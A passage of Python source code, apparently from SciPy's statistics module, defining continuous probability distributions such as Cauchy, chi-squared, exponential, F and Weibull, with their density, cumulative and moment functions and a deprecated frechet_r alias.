return burr._pdf(x, c, 1.0)
def _cdf(self, x, c):
return burr._cdf(x, c, 1.0)
def _sf(self, x, c):
return burr._sf(x, c, 1.0)
def _logpdf(self, x, c):
# fisk.pdf(x, c) = c * x**(-c-1) * (1 + x**(-c))**(-2)
return burr._logpdf(x, c, 1.0)
def _logcdf(self, x, c):
return burr._logcdf(x, c, 1.0)
def _logsf(self, x, c):
return burr._logsf(x, c, 1.0)
def _ppf(self, x, c):
return burr._ppf(x, c, 1.0)
def _munp(self, n, c):
return burr._munp(n, c, 1.0)
def _stats(self, c):
return burr._stats(c, 1.0)
def _entropy(self, c):
return 2 - np.log(c)
fisk = fisk_gen(a=0.0, name='fisk')
# median = loc
class cauchy_gen(rv_continuous):
r"""A Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `cauchy` is
.. math::
f(x) = \frac{1}{\pi (1 + x^2)}
for a real number :math:`x`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# cauchy.pdf(x) = 1 / (pi * (1 + x**2))
return 1.0/np.pi/(1.0+x*x)
def _cdf(self, x):
return 0.5 + 1.0/np.pi*np.arctan(x)
def _ppf(self, q):
return np.tan(np.pi*q-np.pi/2.0)
def _sf(self, x):
return 0.5 - 1.0/np.pi*np.arctan(x)
def _isf(self, q):
return np.tan(np.pi/2.0-np.pi*q)
def _stats(self):
return np.nan, np.nan, np.nan, np.nan
def _entropy(self):
return np.log(4*np.pi)
def _fitstart(self, data, args=None):
# Initialize ML guesses using quartiles instead of moments.
p25, p50, p75 = np.percentile(data, [25, 50, 75])
return p50, (p75 - p25)/2
cauchy = cauchy_gen(name='cauchy')
class chi_gen(rv_continuous):
r"""A chi continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `chi` is:
.. math::
f(x, k) = \frac{1}{2^{k/2-1} \Gamma \left( k/2 \right)}
x^{k-1} \exp \left( -x^2/2 \right)
for :math:`x >= 0` and :math:`k > 0` (degrees of freedom, denoted ``df``
in the implementation). :math:`\Gamma` is the gamma function
(`scipy.special.gamma`).
Special cases of `chi` are:
- ``chi(1, loc, scale)`` is equivalent to `halfnorm`
- ``chi(2, 0, scale)`` is equivalent to `rayleigh`
- ``chi(3, 0, scale)`` is equivalent to `maxwell`
`chi` takes ``df`` as a shape parameter.
%(after_notes)s
%(example)s
"""
def _rvs(self, df):
sz, rndm = self._size, self._random_state
return np.sqrt(chi2.rvs(df, size=sz, random_state=rndm))
def _pdf(self, x, df):
# x**(df-1) * exp(-x**2/2)
# chi.pdf(x, df) = -------------------------
# 2**(df/2-1) * gamma(df/2)
return np.exp(self._logpdf(x, df))
def _logpdf(self, x, df):
l = np.log(2) - .5*np.log(2)*df - sc.gammaln(.5*df)
return l + sc.xlogy(df - 1., x) - .5*x**2
def _cdf(self, x, df):
return sc.gammainc(.5*df, .5*x**2)
def _ppf(self, q, df):
return np.sqrt(2*sc.gammaincinv(.5*df, q))
def _stats(self, df):
mu = np.sqrt(2)*sc.gamma(df/2.0+0.5)/sc.gamma(df/2.0)
mu2 = df - mu*mu
g1 = (2*mu**3.0 + mu*(1-2*df))/np.asarray(np.power(mu2, 1.5))
g2 = 2*df*(1.0-df)-6*mu**4 + 4*mu**2 * (2*df-1)
g2 /= np.asarray(mu2**2.0)
return mu, mu2, g1, g2
chi = chi_gen(a=0.0, name='chi')
## Chi-squared (gamma-distributed with loc=0 and scale=2 and shape=df/2)
class chi2_gen(rv_continuous):
r"""A chi-squared continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `chi2` is:
.. math::
f(x, k) = \frac{1}{2^{k/2} \Gamma \left( k/2 \right)}
x^{k/2-1} \exp \left( -x/2 \right)
for :math:`x > 0` and :math:`k > 0` (degrees of freedom, denoted ``df``
in the implementation).
`chi2` takes ``df`` as a shape parameter.
%(after_notes)s
%(example)s
"""
def _rvs(self, df):
return self._random_state.chisquare(df, self._size)
def _pdf(self, x, df):
# chi2.pdf(x, df) = 1 / (2*gamma(df/2)) * (x/2)**(df/2-1) * exp(-x/2)
return np.exp(self._logpdf(x, df))
def _logpdf(self, x, df):
return sc.xlogy(df/2.-1, x) - x/2. - sc.gammaln(df/2.) - (np.log(2)*df)/2.
def _cdf(self, x, df):
return sc.chdtr(df, x)
def _sf(self, x, df):
return sc.chdtrc(df, x)
def _isf(self, p, df):
return sc.chdtri(df, p)
def _ppf(self, p, df):
return 2*sc.gammaincinv(df/2, p)
def _stats(self, df):
mu = df
mu2 = 2*df
g1 = 2*np.sqrt(2.0/df)
g2 = 12.0/df
return mu, mu2, g1, g2
chi2 = chi2_gen(a=0.0, name='chi2')
class cosine_gen(rv_continuous):
r"""A cosine continuous random variable.
%(before_notes)s
Notes
-----
The cosine distribution is an approximation to the normal distribution.
The probability density function for `cosine` is:
.. math::
f(x) = \frac{1}{2\pi} (1+\cos(x))
for :math:`-\pi \le x \le \pi`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# cosine.pdf(x) = 1/(2*pi) * (1+cos(x))
return 1.0/2/np.pi*(1+np.cos(x))
def _cdf(self, x):
return 1.0/2/np.pi*(np.pi + x + np.sin(x))
def _stats(self):
return 0.0, np.pi*np.pi/3.0-2.0, 0.0, -6.0*(np.pi**4-90)/(5.0*(np.pi*np.pi-6)**2)
def _entropy(self):
return np.log(4*np.pi)-1.0
cosine = cosine_gen(a=-np.pi, b=np.pi, name='cosine')
class dgamma_gen(rv_continuous):
r"""A double gamma continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `dgamma` is:
.. math::
f(x, a) = \frac{1}{2\Gamma(a)} |x|^{a-1} \exp(-|x|)
for a real number :math:`x` and :math:`a > 0`. :math:`\Gamma` is the
gamma function (`scipy.special.gamma`).
`dgamma` takes ``a`` as a shape parameter for :math:`a`.
%(after_notes)s
%(example)s
"""
def _rvs(self, a):
sz, rndm = self._size, self._random_state
u = rndm.random_sample(size=sz)
gm = gamma.rvs(a, size=sz, random_state=rndm)
return gm * np.where(u >= 0.5, 1, -1)
def _pdf(self, x, a):
# dgamma.pdf(x, a) = 1 / (2*gamma(a)) * abs(x)**(a-1) * exp(-abs(x))
ax = abs(x)
return 1.0/(2*sc.gamma(a))*ax**(a-1.0) * np.exp(-ax)
def _logpdf(self, x, a):
ax = abs(x)
return sc.xlogy(a - 1.0, ax) - ax - np.log(2) - sc.gammaln(a)
def _cdf(self, x, a):
fac = 0.5*sc.gammainc(a, abs(x))
return np.where(x > 0, 0.5 + fac, 0.5 - fac)
def _sf(self, x, a):
fac = 0.5*sc.gammainc(a, abs(x))
return np.where(x > 0, 0.5-fac, 0.5+fac)
def _ppf(self, q, a):
fac = sc.gammainccinv(a, 1-abs(2*q-1))
return np.where(q > 0.5, fac, -fac)
def _stats(self, a):
mu2 = a*(a+1.0)
return 0.0, mu2, 0.0, (a+2.0)*(a+3.0)/mu2-3.0
dgamma = dgamma_gen(name='dgamma')
class dweibull_gen(rv_continuous):
r"""A double Weibull continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `dweibull` is given by
.. math::
f(x, c) = c / 2 |x|^{c-1} \exp(-|x|^c)
for a real number :math:`x` and :math:`c > 0`.
`dweibull` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _rvs(self, c):
sz, rndm = self._size, self._random_state
u = rndm.random_sample(size=sz)
w = weibull_min.rvs(c, size=sz, random_state=rndm)
return w * (np.where(u >= 0.5, 1, -1))
def _pdf(self, x, c):
# dweibull.pdf(x, c) = c / 2 * abs(x)**(c-1) * exp(-abs(x)**c)
ax = abs(x)
Px = c / 2.0 * ax**(c-1.0) * np.exp(-ax**c)
return Px
def _logpdf(self, x, c):
ax = abs(x)
return np.log(c) - np.log(2.0) + sc.xlogy(c - 1.0, ax) - ax**c
def _cdf(self, x, c):
Cx1 = 0.5 * np.exp(-abs(x)**c)
return np.where(x > 0, 1 - Cx1, Cx1)
def _ppf(self, q, c):
fac = 2. * np.where(q <= 0.5, q, 1. - q)
fac = np.power(-np.log(fac), 1.0 / c)
return np.where(q > 0.5, fac, -fac)
def _munp(self, n, c):
return (1 - (n % 2)) * sc.gamma(1.0 + 1.0 * n / c)
# since we know that all odd moments are zeros, return them at once.
# returning Nones from _stats makes the public stats call _munp
# so overall we're saving one or two gamma function evaluations here.
def _stats(self, c):
return 0, None, 0, None
dweibull = dweibull_gen(name='dweibull')
## Exponential (gamma distributed with a=1.0, loc=loc and scale=scale)
class expon_gen(rv_continuous):
r"""An exponential continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `expon` is:
.. math::
f(x) = \exp(-x)
for :math:`x \ge 0`.
%(after_notes)s
A common parameterization for `expon` is in terms of the rate parameter
``lambda``, such that ``pdf = lambda * exp(-lambda * x)``. This
parameterization corresponds to using ``scale = 1 / lambda``.
%(example)s
"""
def _rvs(self):
return self._random_state.standard_exponential(self._size)
def _pdf(self, x):
# expon.pdf(x) = exp(-x)
return np.exp(-x)
def _logpdf(self, x):
return -x
def _cdf(self, x):
return -sc.expm1(-x)
def _ppf(self, q):
return -sc.log1p(-q)
def _sf(self, x):
return np.exp(-x)
def _logsf(self, x):
return -x
def _isf(self, q):
return -np.log(q)
def _stats(self):
return 1.0, 1.0, 2.0, 6.0
def _entropy(self):
return 1.0
@replace_notes_in_docstring(rv_continuous, notes="""\
This function uses explicit formulas for the maximum likelihood
estimation of the exponential distribution parameters, so the
`optimizer`, `loc` and `scale` keyword arguments are ignored.\n\n""")
def fit(self, data, *args, **kwds):
if len(args) > 0:
raise TypeError("Too many arguments.")
floc = kwds.pop('floc', None)
fscale = kwds.pop('fscale', None)
_remove_optimizer_parameters(kwds)
if floc is not None and fscale is not None:
# This check is for consistency with `rv_continuous.fit`.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
data = np.asarray(data)
data_min = data.min()
if floc is None:
# ML estimate of the location is the minimum of the data.
loc = data_min
else:
loc = floc
if data_min < loc:
# There are values that are less than the specified loc.
raise FitDataError("expon", lower=floc, upper=np.inf)
if fscale is None:
# ML estimate of the scale is the shifted mean.
scale = data.mean() - loc
else:
scale = fscale
# We expect the return values to be floating point, so ensure it
# by explicitly converting to float.
return float(loc), float(scale)
expon = expon_gen(a=0.0, name='expon')
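# Illustrative sketch (not part of the original file): the rate
# parameterization noted above in practice -- a rate ``lam`` corresponds to
# ``scale = 1/lam``, so draws average roughly 1/lam. Values are hypothetical.
def _expon_rate_sketch(lam=2.0, size=1000):
    samples = expon.rvs(scale=1.0/lam, size=size)
    return samples.mean()   # ~0.5 for lam == 2.0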
## Exponentially Modified Normal (exponential distribution
## convolved with a Normal).
## This is called an exponentially modified gaussian on wikipedia
class exponnorm_gen(rv_continuous):
r"""An exponentially modified Normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `exponnorm` is:
.. math::
f(x, K) = \frac{1}{2K} \exp\left(\frac{1}{2 K^2} - x / K \right)
\text{erfc}\left(-\frac{x - 1/K}{\sqrt{2}}\right)
where :math:`x` is a real number and :math:`K > 0`.
It can be thought of as the sum of a standard normal random variable
and an independent exponentially distributed random variable with rate
``1/K``.
%(after_notes)s
An alternative parameterization of this distribution (for example, in
`Wikipedia <https://en.wikipedia.org/wiki/Exponentially_modified_Gaussian_distribution>`_)
involves three parameters, :math:`\mu`, :math:`\lambda` and
:math:`\sigma`.
In the present parameterization this corresponds to having ``loc`` and
``scale`` equal to :math:`\mu` and :math:`\sigma`, respectively, and
shape parameter :math:`K = 1/(\sigma\lambda)`.
.. versionadded:: 0.16.0
%(example)s
"""
def _rvs(self, K):
expval = self._random_state.standard_exponential(self._size) * K
gval = self._random_state.standard_normal(self._size)
return expval + gval
def _pdf(self, x, K):
# exponnorm.pdf(x, K) =
# 1/(2*K) exp(1/(2 * K**2)) exp(-x / K) * erfc-(x - 1/K) / sqrt(2))
invK = 1.0 / K
exparg = 0.5 * invK**2 - invK * x
# Avoid overflows; setting np.exp(exparg) to the max float works
# all right here
expval = _lazywhere(exparg < _LOGXMAX, (exparg,), np.exp, _XMAX)
return 0.5 * invK * (expval * sc.erfc(-(x - invK) / np.sqrt(2)))
def _logpdf(self, x, K):
invK = 1.0 / K
exparg = 0.5 * invK**2 - invK * x
return exparg + np.log(0.5 * invK * sc.erfc(-(x - invK) / np.sqrt(2)))
def _cdf(self, x, K):
invK = 1.0 / K
expval = invK * (0.5 * invK - x)
return _norm_cdf(x) - np.exp(expval) * _norm_cdf(x - invK)
def _sf(self, x, K):
invK = 1.0 / K
expval = invK * (0.5 * invK - x)
return _norm_cdf(-x) + np.exp(expval) * _norm_cdf(x - invK)
def _stats(self, K):
K2 = K * K
opK2 = 1.0 + K2
skw = 2 * K**3 * opK2**(-1.5)
krt = 6.0 * K2 * K2 * opK2**(-2)
return K, opK2, skw, krt
exponnorm = exponnorm_gen(name='exponnorm')
class exponweib_gen(rv_continuous):
r"""An exponentiated Weibull continuous random variable.
%(before_notes)s
See Also
--------
weibull_min, numpy.random.mtrand.RandomState.weibull
Notes
-----
The probability density function for `exponweib` is:
.. math::
f(x, a, c) = a c [1-\exp(-x^c)]^{a-1} \exp(-x^c) x^{c-1}
and its cumulative distribution function is:
.. math::
F(x, a, c) = [1-\exp(-x^c)]^a
for :math:`x > 0`, :math:`a > 0`, :math:`c > 0`.
`exponweib` takes :math:`a` and :math:`c` as shape parameters:
* :math:`a` is the exponentiation parameter,
with the special case :math:`a=1` corresponding to the
(non-exponentiated) Weibull distribution `weibull_min`.
* :math:`c` is the shape parameter of the non-exponentiated Weibull law.
%(after_notes)s
References
----------
https://en.wikipedia.org/wiki/Exponentiated_Weibull_distribution
%(example)s
"""
def _pdf(self, x, a, c):
# exponweib.pdf(x, a, c) =
# a * c * (1-exp(-x**c))**(a-1) * exp(-x**c)*x**(c-1)
return np.exp(self._logpdf(x, a, c))
def _logpdf(self, x, a, c):
negxc = -x**c
exm1c = -sc.expm1(negxc)
logp = (np.log(a) + np.log(c) + sc.xlogy(a - 1.0, exm1c) +
negxc + sc.xlogy(c - 1.0, x))
return logp
def _cdf(self, x, a, c):
exm1c = -sc.expm1(-x**c)
return exm1c**a
def _ppf(self, q, a, c):
return (-sc.log1p(-q**(1.0/a)))**np.asarray(1.0/c)
exponweib = exponweib_gen(a=0.0, name='exponweib')
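# Consistency sketch (illustrative values): with a=1 the exponentiated
# Weibull reduces to the plain Weibull, so the CDFs agree:
#
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.allclose(stats.exponweib.cdf(1.2, 1, 2.5),
# ...             stats.weibull_min.cdf(1.2, 2.5))
# True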
class exponpow_gen(rv_continuous):
r"""An exponential power continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `exponpow` is:
.. math::
f(x, b) = b x^{b-1} \exp(1 + x^b - \exp(x^b))
for :math:`x \ge 0`, :math:`b > 0`. Note that this is a different
distribution from the exponential power distribution that is also known
under the names "generalized normal" or "generalized Gaussian".
`exponpow` takes ``b`` as a shape parameter for :math:`b`.
%(after_notes)s
References
----------
http://www.math.wm.edu/~leemis/chart/UDR/PDFs/Exponentialpower.pdf
%(example)s
"""
def _pdf(self, x, b):
# exponpow.pdf(x, b) = b * x**(b-1) * exp(1 + x**b - exp(x**b))
return np.exp(self._logpdf(x, b))
def _logpdf(self, x, b):
xb = x**b
f = 1 + np.log(b) + sc.xlogy(b - 1.0, x) + xb - np.exp(xb)
return f
def _cdf(self, x, b):
return -sc.expm1(-sc.expm1(x**b))
def _sf(self, x, b):
return np.exp(-sc.expm1(x**b))
def _isf(self, x, b):
return (sc.log1p(-np.log(x)))**(1./b)
def _ppf(self, q, b):
return pow(sc.log1p(-sc.log1p(-q)), 1.0/b)
exponpow = exponpow_gen(a=0.0, name='exponpow')
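# Round-trip sketch (illustrative values): _ppf above inverts _cdf, so
# cdf(ppf(q)) recovers q up to floating point:
#
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.isclose(stats.exponpow.cdf(stats.exponpow.ppf(0.3, 2.0), 2.0), 0.3)
# True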
class fatiguelife_gen(rv_continuous):
r"""A fatigue-life (Birnbaum-Saunders) continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `fatiguelife` is:
.. math::
f(x, c) = \frac{x+1}{2c\sqrt{2\pi x^3}} \exp(-\frac{(x-1)^2}{2x c^2})
for :math:`x >= 0` and :math:`c > 0`.
`fatiguelife` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
References
----------
.. [1] "Birnbaum-Saunders distribution",
https://en.wikipedia.org/wiki/Birnbaum-Saunders_distribution
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _rvs(self, c):
z = self._random_state.standard_normal(self._size)
x = 0.5*c*z
x2 = x*x
t = 1.0 + 2*x2 + 2*x*np.sqrt(1 + x2)
return t
def _pdf(self, x, c):
# fatiguelife.pdf(x, c) =
# (x+1) / (2*c*sqrt(2*pi*x**3)) * exp(-(x-1)**2/(2*x*c**2))
return np.exp(self._logpdf(x, c))
def _logpdf(self, x, c):
return (np.log(x+1) - (x-1)**2 / (2.0*x*c**2) - np.log(2*c) -
0.5*(np.log(2*np.pi) + 3*np.log(x)))
def _cdf(self, x, c):
return _norm_cdf(1.0 / c * (np.sqrt(x) - 1.0/np.sqrt(x)))
def _ppf(self, q, c):
tmp = c*sc.ndtri(q)
return 0.25 * (tmp + np.sqrt(tmp**2 + 4))**2
def _stats(self, c):
        # NB: the formula for kurtosis on Wikipedia seems to have an error:
        # it's 40, not 41. At least it disagrees with the one from Wolfram
        # Alpha. And the latter one, below, passes the tests, while the wiki
        # one doesn't. So far I didn't have the guts to actually check the
        # coefficients from the expressions for the raw moments.
c2 = c*c
mu = c2 / 2.0 + 1.0
den = 5.0 * c2 + 4.0
mu2 = c2*den / 4.0
g1 = 4 * c * (11*c2 + 6.0) / np.power(den, 1.5)
g2 = 6 * c2 * (93*c2 + 40.0) / den**2.0
return mu, mu2, g1, g2
fatiguelife = fatiguelife_gen(a=0.0, name='fatiguelife')
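# Small check of the _stats formulas above (illustrative value): the mean
# is c**2 / 2 + 1:
#
# >>> from scipy import stats
# >>> stats.fatiguelife.mean(0.5)
# 1.125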
class foldcauchy_gen(rv_continuous):
r"""A folded Cauchy continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `foldcauchy` is:
.. math::
f(x, c) = \frac{1}{\pi (1+(x-c)^2)} + \frac{1}{\pi (1+(x+c)^2)}
for :math:`x \ge 0`.
`foldcauchy` takes ``c`` as a shape parameter for :math:`c`.
%(example)s
"""
def _rvs(self, c):
return abs(cauchy.rvs(loc=c, size=self._size,
random_state=self._random_state))
def _pdf(self, x, c):
# foldcauchy.pdf(x, c) = 1/(pi*(1+(x-c)**2)) + 1/(pi*(1+(x+c)**2))
return 1.0/np.pi*(1.0/(1+(x-c)**2) + 1.0/(1+(x+c)**2))
def _cdf(self, x, c):
return 1.0/np.pi*(np.arctan(x-c) + np.arctan(x+c))
def _stats(self, c):
return np.inf, np.inf, np.nan, np.nan
foldcauchy = foldcauchy_gen(a=0.0, name='foldcauchy')
class f_gen(rv_continuous):
r"""An F continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `f` is:
.. math::
f(x, df_1, df_2) = \frac{df_2^{df_2/2} df_1^{df_1/2} x^{df_1 / 2-1}}
{(df_2+df_1 x)^{(df_1+df_2)/2}
B(df_1/2, df_2/2)}
for :math:`x > 0`.
`f` takes ``dfn`` and ``dfd`` as shape parameters.
%(after_notes)s
%(example)s
"""
def _rvs(self, dfn, dfd):
return self._random_state.f(dfn, dfd, self._size)
def _pdf(self, x, dfn, dfd):
# df2**(df2/2) * df1**(df1/2) * x**(df1/2-1)
# F.pdf(x, df1, df2) = --------------------------------------------
# (df2+df1*x)**((df1+df2)/2) * B(df1/2, df2/2)
return np.exp(self._logpdf(x, dfn, dfd))
def _logpdf(self, x, dfn, dfd):
n = 1.0 * dfn
m = 1.0 * dfd
lPx = m/2 * np.log(m) + n/2 * np.log(n) + sc.xlogy(n/2 - 1, x)
lPx -= ((n+m)/2) * np.log(m + n*x) + sc.betaln(n/2, m/2)
return lPx
def _cdf(self, x, dfn, dfd):
return sc.fdtr(dfn, dfd, x)
def _sf(self, x, dfn, dfd):
return sc.fdtrc(dfn, dfd, x)
def _ppf(self, q, dfn, dfd):
return sc.fdtri(dfn, dfd, q)
def _stats(self, dfn, dfd):
v1, v2 = 1. * dfn, 1. * dfd
v2_2, v2_4, v2_6, v2_8 = v2 - 2., v2 - 4., v2 - 6., v2 - 8.
mu = _lazywhere(
v2 > 2, (v2, v2_2),
lambda v2, v2_2: v2 / v2_2,
np.inf)
mu2 = _lazywhere(
v2 > 4, (v1, v2, v2_2, v2_4),
lambda v1, v2, v2_2, v2_4:
2 * v2 * v2 * (v1 + v2_2) / (v1 * v2_2**2 * v2_4),
np.inf)
g1 = _lazywhere(
v2 > 6, (v1, v2_2, v2_4, v2_6),
lambda v1, v2_2, v2_4, v2_6:
(2 * v1 + v2_2) / v2_6 * np.sqrt(v2_4 / (v1 * (v1 + v2_2))),
np.nan)
g1 *= np.sqrt(8.)
g2 = _lazywhere(
v2 > 8, (g1, v2_6, v2_8),
lambda g1, v2_6, v2_8: (8 + g1 * g1 * v2_6) / v2_8,
np.nan)
g2 *= 3. / 2.
return mu, mu2, g1, g2
f = f_gen(a=0.0, name='f')
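# Sketch of the moment formulas above (illustrative values): for dfd > 2
# the mean is dfd / (dfd - 2):
#
# >>> from scipy import stats
# >>> stats.f.mean(5, 10)
# 1.25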
## Folded Normal
##   abs(Z) where Z is normal with mean=L and std=S, so that c = abs(L)/S
##
##  note: the Regress docs have the scale parameter correct, but the first
##    parameter given there is a shape parameter, A = c * scale
##  Half-normal is the folded normal with shape parameter c=0.
class foldnorm_gen(rv_continuous):
r"""A folded normal continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `foldnorm` is:
.. math::
f(x, c) = \sqrt{2/\pi} cosh(c x) \exp(-\frac{x^2+c^2}{2})
for :math:`c \ge 0`.
`foldnorm` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _argcheck(self, c):
return c >= 0
def _rvs(self, c):
return abs(self._random_state.standard_normal(self._size) + c)
def _pdf(self, x, c):
        # foldnorm.pdf(x, c) = sqrt(2/pi) * cosh(c*x) * exp(-(x**2+c**2)/2)
return _norm_pdf(x + c) + _norm_pdf(x-c)
def _cdf(self, x, c):
return _norm_cdf(x-c) + _norm_cdf(x+c) - 1.0
def _stats(self, c):
# Regina C. Elandt, Technometrics 3, 551 (1961)
# https://www.jstor.org/stable/1266561
#
c2 = c*c
expfac = np.exp(-0.5*c2) / np.sqrt(2.*np.pi)
mu = 2.*expfac + c * sc.erf(c/np.sqrt(2))
mu2 = c2 + 1 - mu*mu
g1 = 2. * (mu*mu*mu - c2*mu - expfac)
g1 /= np.power(mu2, 1.5)
g2 = c2 * (c2 + 6.) + 3 + 8.*expfac*mu
g2 += (2. * (c2 - 3.) - 3. * mu**2) * mu**2
g2 = g2 / mu2**2.0 - 3.
return mu, mu2, g1, g2
foldnorm = foldnorm_gen(a=0.0, name='foldnorm')
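# Sketch of the remark above that the half-normal is the folded normal with
# c=0 (`halfnorm` is defined later in this module; values illustrative):
#
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.allclose(stats.foldnorm.pdf(0.5, 0), stats.halfnorm.pdf(0.5))
# True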
class weibull_min_gen(rv_continuous):
r"""Weibull minimum continuous random variable.
The Weibull Minimum Extreme Value distribution, from extreme value theory,
is also often simply called the Weibull distribution.
%(before_notes)s
See Also
--------
weibull_max, numpy.random.mtrand.RandomState.weibull, exponweib
Notes
-----
The probability density function for `weibull_min` is:
.. math::
f(x, c) = c x^{c-1} \exp(-x^c)
for :math:`x >= 0`, :math:`c > 0`.
`weibull_min` takes ``c`` as a shape parameter for :math:`c`.
    (named :math:`k` in the Wikipedia article and :math:`a` in
    ``numpy.random.weibull``).  Special shape values are :math:`c=1` and
    :math:`c=2`, where the Weibull distribution reduces to the `expon` and
    `rayleigh` distributions respectively.
%(after_notes)s
References
----------
https://en.wikipedia.org/wiki/Weibull_distribution
%(example)s
"""
def _pdf(self, x, c):
        # weibull_min.pdf(x, c) = c * x**(c-1) * exp(-x**c)
return c*pow(x, c-1)*np.exp(-pow(x, c))
def _logpdf(self, x, c):
return np.log(c) + sc.xlogy(c - 1, x) - pow(x, c)
def _cdf(self, x, c):
return -sc.expm1(-pow(x, c))
def _sf(self, x, c):
return np.exp(-pow(x, c))
def _logsf(self, x, c):
return -pow(x, c)
def _ppf(self, q, c):
return pow(-sc.log1p(-q), 1.0/c)
def _munp(self, n, c):
return sc.gamma(1.0+n*1.0/c)
def _entropy(self, c):
return -_EULER / c - np.log(c) + _EULER + 1
weibull_min = weibull_min_gen(a=0.0, name='weibull_min')
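# Sketch of the special cases noted in the docstring (illustrative values):
# c=1 gives the exponential distribution and c=2 the Rayleigh:
#
# >>> import numpy as np
# >>> from scipy import stats
# >>> np.allclose(stats.weibull_min.pdf(0.7, 1), stats.expon.pdf(0.7))
# True
# >>> np.allclose(stats.weibull_min.cdf(0.7, 2, scale=np.sqrt(2)),
# ...             stats.rayleigh.cdf(0.7))
# True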
class weibull_max_gen(rv_continuous):
r"""Weibull maximum continuous random variable.
%(before_notes)s
See Also
--------
weibull_min
Notes
-----
The probability density function for `weibull_max` is:
.. math::
f(x, c) = c (-x)^{c-1} \exp(-(-x)^c)
for :math:`x < 0`, :math:`c > 0`.
`weibull_max` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, c):
        # weibull_max.pdf(x, c) = c * (-x)**(c-1) * exp(-(-x)**c)
return c*pow(-x, c-1)*np.exp(-pow(-x, c))
def _logpdf(self, x, c):
return np.log(c) + sc.xlogy(c-1, -x) - pow(-x, c)
def _cdf(self, x, c):
return np.exp(-pow(-x, c))
def _logcdf(self, x, c):
return -pow(-x, c)
def _sf(self, x, c):
return -sc.expm1(-pow(-x, c))
def _ppf(self, q, c):
return -pow(-np.log(q), 1.0/c)
def _munp(self, n, c):
val = sc.gamma(1.0+n*1.0/c)
if int(n) % 2:
sgn = -1
else:
sgn = 1
return sgn * val
def _entropy(self, c):
return -_EULER / c - np.log(c) + _EULER + 1
weibull_max = weibull_max_gen(b=0.0, name='weibull_max')
# Public methods to be deprecated in frechet_r and frechet_l:
# ['__call__', 'cdf', 'entropy', 'expect', 'fit', 'fit_loc_scale', 'freeze',
# 'interval', 'isf', 'logcdf', 'logpdf', 'logsf', 'mean', 'median', 'moment',
# 'nnlf', 'pdf', 'ppf', 'rvs', 'sf', 'stats', 'std', 'var']
_frechet_r_deprec_msg = """\
The distribution `frechet_r` is a synonym for `weibull_min`; this historical
usage is deprecated because of possible confusion with the (quite different)
Frechet distribution. To preserve the existing behavior of the program, use
`scipy.stats.weibull_min`. For the Frechet distribution (i.e. the Type II
extreme value distribution), use `scipy.stats.invweibull`."""
class frechet_r_gen(weibull_min_gen):
"""A Frechet right (or Weibull minimum) continuous random variable.
%(before_notes)s
See Also
--------
weibull_min : The same distribution as `frechet_r`.
Notes
-----
%(after_notes)s
%(example)s
"""
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def __call__(self, *args, **kwargs):
return weibull_min_gen.__call__(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def cdf(self, *args, **kwargs):
return weibull_min_gen.cdf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def entropy(self, *args, **kwargs):
return weibull_min_gen.entropy(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def expect(self, *args, **kwargs):
return weibull_min_gen.expect(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def fit(self, *args, **kwargs):
return weibull_min_gen.fit(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def fit_loc_scale(self, *args, **kwargs):
return weibull_min_gen.fit_loc_scale(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def freeze(self, *args, **kwargs):
return weibull_min_gen.freeze(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def interval(self, *args, **kwargs):
return weibull_min_gen.interval(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def isf(self, *args, **kwargs):
return weibull_min_gen.isf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def logcdf(self, *args, **kwargs):
return weibull_min_gen.logcdf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def logpdf(self, *args, **kwargs):
return weibull_min_gen.logpdf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def logsf(self, *args, **kwargs):
return weibull_min_gen.logsf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def mean(self, *args, **kwargs):
return weibull_min_gen.mean(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def median(self, *args, **kwargs):
return weibull_min_gen.median(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def moment(self, *args, **kwargs):
return weibull_min_gen.moment(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def nnlf(self, *args, **kwargs):
return weibull_min_gen.nnlf(self, *args, **kwargs)
@np.deprecate(old_name='frechet_r', message=_frechet_r_deprec_msg)
def pdf(self, *args, **kwargs):
return weibull_min_gen.pdf(self, *args, **kwargs)
